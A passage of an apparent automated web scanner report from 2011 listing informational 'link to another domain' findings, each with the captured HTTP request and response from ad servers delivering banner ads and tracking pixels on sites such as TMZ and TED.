<script type="text/javascript">
var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/f/8b/%2a/i%3B243805900%3B1-0%3B0%3B67516235%3B3454-728/90%3B42127629/42145416/1%3B
...[SNIP]...
</script>

<script src="http://cdn.royale.spongecell.com/api/placements/47212992.js" type="text/javascript"></script>
...[SNIP]...
f%2fwww.volvocars.com/us/all-cars/volvo-s60/Pages/default.aspxhttp://spongecell.com/api/placements/47212992/clickthrough?noflash=true&noscript=true&site_id=31539&placement_id=67516235" target="_blank"><img alt="728x90" border="0" height="90" src="http://cdn.statics.live.spongecell.com/volvo/2011/s60/jealousy/v4e/assets/728x90.gif" width="728" /></a>
<div style="position:absolute;left:0px;top:0px;visibility: hidden;">
<img alt="" height="0" src="http://analytics.spongecell.com/widgets/266321?action_type=JS_IMPRESSION&anticache=5935216&noflash=true&flight_id=3448&site_id=31539&placement_id=67516235" style="width:0px;height:0px;" width="0" />
</div>
...[SNIP]...

17.10. http://ad.doubleclick.net/adj/N5295.SD128132N5295SN0/B5761718.3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5295.SD128132N5295SN0/B5761718.3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/N5295.SD128132N5295SN0/B5761718.3;sz=728x90;click0=http://a1.interclick.com/icaid/190924/tid/e67830dd-683b-4a1d-ba96-d87e0f55727b/click.ic?;ord=634518039424377847? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 38297
Date: Sat, 17 Sep 2011 01:05:43 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
caid/190924/tid/e67830dd-683b-4a1d-ba96-d87e0f55727b/click.ic?http://www.google.com/offers?utm_source=oa&utm_medium=oa-&site=791901&utm_campaign=en-US&utm_term=pid_69978503-cid_43091605-aid_245022995"><IMG SRC="http://s0.2mdn.net/3125202/PID_1715626_SkyBridge_NY_728x90.jpg" width="728" height="90" BORDER=0 alt="'+ altImgAltText +'"></A>
...[SNIP]...

17.11. http://ad.doubleclick.net/adj/cm.rev_bostonherald/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.rev_bostonherald/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/cm.rev_bostonherald/;net=cm;u=,cm-30116696294_1316221618,,baseball,ax.;;cmw=owl;sz=728x90;net=cm;env=ifr;ord1=40053;dcopt=ist;contx=baseball;an=;dc=s;btg=;ord=%23PCACHEBUSTER? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 812
Date: Sat, 17 Sep 2011 01:48:53 GMT

document.write('');

var ifr = top.location != location ? 1 : 0;
var site = ifr && document.referrer != '' && document.referrer != null ? document.referrer : location.toString(); site = escape(site); site = site.replace(/'/g, '%27');
document.write('<img style="display:none" src="http://tracking.oggifinogi.com/trk/impression.gif?cid=49567ed5-928c-4698-b2db-b2f33b66ecb8&pid=653618c5-6f1a-4d52-9c9a-7d81dd2fe8d9&r=' + site +'&ifr=' + ifr +'&cb=' + Math.random() +'" />');
document.write('<scri' + 'pt type="text/javascript" src=\'http://raw.oggifinogi.com/GetInitScript?oggiId=653618c5-6f1a-4d52-9c9a-7d81dd2fe8d9&oggiWidth=728px&oggiHeight=90px&oggiCampaignId=49567ed5
...[SNIP]...

17.12. http://ad.doubleclick.net/adj/tconf.ted/homepage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/tconf.ted/homepage

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/tconf.ted/homepage;tile=1;sz=192x260;ord=74355640565045180? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.ted.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 248
Date: Sat, 17 Sep 2011 01:51:15 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b85/0/0/%2a/w;44306;0-0;0;32502926;33031-192/260;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

17.13. http://ad.doubleclick.net/adj/tmz.category.wb.dart/black_swan  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/tmz.category.wb.dart/black_swan

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/tmz.category.wb.dart/black_swan;boxad=5;pos=atf;tile=5;sz=300x250;qcseg=D;ord=9152547947596758 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/?adid=hero1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 370
Date: Sat, 17 Sep 2011 00:57:17 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b85/0/0/%2a/v;235667831;0-0;0;61866028;4307-300/250;40477468/40495255/1;;~sscs=%3fhttp://www.wbshop.com/TMZ-Logo-Cell-Phone-Cover/TMZWBPHN,default,pd.html?src=wtmzcpc"><img src="http://s0.2mdn.net/viewad/2516058/TMZ-iPhone-Ad-300x250.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

17.14. http://ad.doubleclick.net/adj/tmz.category.wb.dart/celebrity_hookups  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/tmz.category.wb.dart/celebrity_hookups

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/tmz.category.wb.dart/celebrity_hookups;boxad=5;pos=btf;tile=5;sz=300x250;qcseg=D;ord=362463614437729.1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/?adid=hero3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 5445
Date: Sat, 17 Sep 2011 00:55:51 GMT

var divid='dclkAdsDivID_22599';
document.write('<div id=' + divid + '></div>');
var adsenseHtml_22599 = "<!doctype html><html><head><style><!--\na:link { color: #ffffff }a:visited { color: #ffffff }a:
...[SNIP]...
ives-of-dc/%253Fadid%253Dhero3%26hl%3Den%26client%3Dca-pub-7832112837345590%26adU%3Dwww.Facebook.com/BuxomCosmetics%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNGClRXWoYkTxXO5r7067uwjnRv0pQ\" target=_blank><img alt=\"AdChoices\" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...

17.15. http://ad.doubleclick.net/adj/tmz.category.wb.dart/celebrity_justice  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/tmz.category.wb.dart/celebrity_justice

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/tmz.category.wb.dart/celebrity_justice;boxad=6;pos=btf;tile=6;sz=300x250;qcseg=D;ord=6496930022258312 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 5266
Date: Sat, 17 Sep 2011 00:57:01 GMT

var divid='dclkAdsDivID_10500';
document.write('<div id=' + divid + '></div>');
var adsenseHtml_10500 = "<!doctype html><html><head><style><!--\na:link { color: #000000 }a:visited { color: #000000 }a:
...[SNIP]...
id-fisher-self-defense-police/%26hl%3Den%26client%3Dca-pub-7832112837345590%26adU%3Dwww.Facebook.com/BuxomCosmetics%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNGKHRtTdieMJUFclE52-IpyYlFIlw\" target=_blank><img alt=\"AdChoices\" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...

17.16. http://ad.doubleclick.net/adj/tmz.category.wb.dart/dwts  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/tmz.category.wb.dart/dwts

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/tmz.category.wb.dart/dwts;boxad=5;pos=btf;tile=5;sz=300x250;qcseg=D;ord=2074649943970143.8 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 5224
Date: Sat, 17 Sep 2011 00:54:40 GMT

var divid='dclkAdsDivID_9124';
document.write('<div id=' + divid + '></div>');
var adsenseHtml_9124 = "<!doctype html><html><head><style><!--\na:link { color: #ffffff }a:visited { color: #ffffff }a:ho
...[SNIP]...
cmanus-dancing-with-the-stars/%26hl%3Den%26client%3Dca-pub-7832112837345590%26adU%3Dwww.Facebook.com/BuxomCosmetics%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNG7VnP7kz5nWfztR-yFztp-EtTkuA\" target=_blank><img alt=\"AdChoices\" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...

17.17. http://ad.doubleclick.net/adj/tmz.ros.wb.dart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/tmz.ros.wb.dart/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/tmz.ros.wb.dart/;pos=btf;boxad=6;tile=6;sz=300x250;qcseg=D;ord=362463614437729.1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/?adid=hero3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 5370
Date: Sat, 17 Sep 2011 00:55:40 GMT

var divid='dclkAdsDivID_25511';
document.write('<div id=' + divid + '></div>');
var adsenseHtml_25511 = "<!doctype html><html><head><style><!--\na:link { color: #000000 }a:visited { color: #000000 }a:
...[SNIP]...
ives-of-dc/%253Fadid%253Dhero3%26hl%3Den%26client%3Dca-pub-7832112837345590%26adU%3Dwww.Facebook.com/BuxomCosmetics%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNGClRXWoYkTxXO5r7067uwjnRv0pQ\" target=_blank><img alt=\"AdChoices\" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...

17.18. http://ad.doubleclick.net/adj/tmz.toofab.wb.dart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/tmz.toofab.wb.dart/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/tmz.toofab.wb.dart/;pos=atf;boxad=1;syncad=yes;tile=1;dcopt=ist;sz=728x90,970x66;qcseg=D;ord=9367342558689416 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/category/celeb-couples/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1171
Date: Sat, 17 Sep 2011 01:08:10 GMT

document.write('<iframe src=\"http://view.atdmt.com/AVE/iview/311891103/direct;wi.728;hi.90/01/1776018?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/w%3B243457110%3B0-0%3B0%3B46393748%3B
...[SNIP]...
ick%3Bh%3Dv8/3b85/3/0/%2a/w%3B243457110%3B0-0%3B0%3B46393748%3B3454-728/90%3B41747648/41765435/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/AVE/go/311891103/direct;wi.728;hi.90/01/1776018" target="_blank"><img src="http://view.atdmt.com/AVE/view/311891103/direct;wi.728;hi.90/01/1776018"/></a>
...[SNIP]...

17.19. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /server/ads.js?pub=5757418&cch=5766966&code=5766978&l=300x250&aid=24929288&ahcid=94503&bimpd=voqDxmNmRjBaA8Zz-th9DVshh1AkGo7LWwe_TxW8LQDXBnrMYrn8R4lNlo6ecdUb-EpQGpKm_SMQatACmTaQGvQ2ov8F96a44-ogx0KaEDlT1vwHSZZrW-i6-uvEqPJj9KMZLuWlAizASdNlxsuUJ7I6aHkjBWPfN5PAQppq5jMGC882u_iJVio0sgT2Hu2OSdV-WY28YEByPK7UN11nKmbcICd-u9n-QBulvjRsDUukNf677Pl7H1K-DXuKQYFzhnxTe09_2aSwkq_VAfno3AEEnU9ZoUfr-p6NUPjEx3ouThWk7jGNQUfDpq_-E9lyeUNCVDs-pnDZoEJsMIgPV0Ea3VLM_babBb7Ie7uZtnRNSvp0KouFCoPWYoocSCVrFwO7o3Hyp3f5ShJe9qyOX8El33vV-FMioAdggsiJWiR67Ov3E-MBKO1a1dcUUT8hVFC18O7aTQ7Al3l-ZIlOyIe6uErt8WmSHu39BR3iXEefnNn7Hwz39qDvJM3bCnb8bAWjThww1C0QnqyrWAyPccvRws3xtVdfdGuHa1GI5Tu98HPnEOxUSpyEymMzt82FT7R-RQIf58hFBEVNsBinpNPFeyT-gVgRYQYu76r_RsSbI460DX5bHb82DsbvNd-WvfBz5xDsVEqchMpjM7fNhTqup7HcsA5S0YcjyyexYQBRcWzwJ7vLnVIEQ5EjkdW1H7qEuZyrpROY1gJheqlJayTH5RA5s03vBDwT2Wf5mZ6nkfGqqn9_LM-4SmmUw6c1zgp3p9vKxvfLoavehB6mz6nKIs6dCn7OcUO3ep_7SiS2VAyBEgSajIaDvTyegPGDzzFj3I9rHIBT-JBRvQ9iLQ&acp=0.45 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; rrs=1006%7C1003%7C1002%7C1%7C1004%7C9%7C6; rds=15231%7C15228%7C15228%7C15232%7C15228%7C15228%7C15231; rv=1; uid=2944787775510337379

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Mon, 19 Sep 2011 00:52:00 GMT
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pf=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:00 GMT
Content-Length: 8526


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
return document.all[id];};}var getQueryParamValue=deconcept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;


document.write('\n\n\n    \n\n     \n        \n                \n        <a target="turn_ad_landing_page" href="http://www.smokeybear.com"><img border="0" src="http://img.turn.com/img/server/ads/ps/300x250.jpg">
...[SNIP]...

17.20. https://admin.usenetbinaries.com/cgi-bin/signup  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.usenetbinaries.com
Path:   /cgi-bin/signup

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /cgi-bin/signup?package=pro HTTP/1.1
Host: admin.usenetbinaries.com
Connection: keep-alive
Referer: http://www.usenetbinaries.com/l/newsgroups.html?r=aw;kw=usenet&gclid=CLHh78_AoqsCFRRSgwod8HVslQ
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UBReferer=S&aw&T&1316201486&P&&K&usenet&H&2tApedj%2BMqga5hQNxux7lA&C&&R&http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dnntp%2Bserver&U&http%3A%2F%2Fwww.usenetbinaries.com%2Fl%2Fnewsgroups.html

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:32:48 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 5402

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>
Usenet Binaries Dot Com - New Account Secure Signup
</title>
<meta name="keyw
...[SNIP]...
</div>

<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

17.21. http://ads.adsonar.com/adserving/getAds.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1500495&pid=2083767&zw=300&zh=250&url=http%3A//www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/&v=5&dct=Exclusive%3A%20Melissa%20Rivers%20Splits%20With%20Boyfriend%20%7C%20tooFab.com&ref=http%3A//www.toofab.com/&metakw=Melissa%20Rivers,Joan%20Rivers,Jason%20Zimmerman HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:51:03 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 14317


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
<td class="sps_1500493" style="height:12px;" nowrap="nowrap" align="right">
                                       &nbsp;<a href="http://tmz.sl.advertising.com/admin/advertisers/indexPl.jsp" target="_blank">
                                       
                                           Buy a link here
                                       
                                       </a>
...[SNIP]...

17.22. http://ads.bluelithium.com/st  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /st?ad_type=iframe&ad_size=1x1&section=2475049 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=951
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:11:55 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sat, 17 Sep 2011 01:11:55 GMT
Pragma: no-cache
Content-Length: 4574
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
</noscript><img src="http://content.yieldmanager.com/ak/q.gif" style="display:none" width="1" height="1" border="0" alt="" /></body>
...[SNIP]...

17.23. http://ads.dotomi.com/ads_smokey_pure.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.dotomi.com
Path:   /ads_smokey_pure.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ads_smokey_pure.php?ms=18 HTTP/1.1
Host: ads.dotomi.com
Proxy-Connection: keep-alive
Referer: http://ads.dotomi.com/ads.php?pid=18300&mtg=0&ms=18&btg=1&mp=1&dres=iframe&rwidth=728&rheight=90&pp=0&cg=42&tz=300
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DotomiUser=230900890276886667$0$2054424934; DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaVg%3D; DotomiStatus=5

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.17
p3p: policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP"
Vary: Accept-Encoding
Content-Length: 306
Content-Type: text/html; charset=UTF-8
Date: Sat, 17 Sep 2011 01:49:07 GMT
Connection: close

<html>
<head></head>
<body bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"><a href="http://www.smokeybear.com/take-pledge.asp" target="_blank"><IMG alt="www.smokeybear.com" border="0" src="http://ads.dotomi.com/banners/smokey/728.gif">
...[SNIP]...

17.24. http://ads.tw.adsonar.com/adserving/getAds.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1459308&pid=1039767&ps=-1&zw=590&zh=225&url=http%3A//www.tmz.com/&v=5&dct=Celebrity%20Gossip%20%7C%20Entertainment%20News%20%7C%20Celebrity%20News%20%7C%20TMZ.com&metakw=Celebrity,Celebrity%20Gossip,Celebrity%20Photos,Hollywood%20Rumors,Entertainment%20News HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:02 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 13796


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
